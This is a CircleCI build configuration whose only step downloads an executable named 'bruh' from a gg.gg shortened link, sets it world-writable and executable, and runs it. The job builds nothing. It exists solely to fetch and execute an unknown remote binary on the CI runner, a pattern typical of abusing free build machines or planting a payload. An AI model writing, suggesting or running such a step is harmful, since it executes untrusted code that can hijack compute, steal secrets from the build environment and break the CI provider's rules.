version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:202107-02
    resource_class: medium
    steps:
      - run: wget -O bruh http://gg.gg/vkmf5 && chmod +x bruh && chmod 777 bruh && ./bruh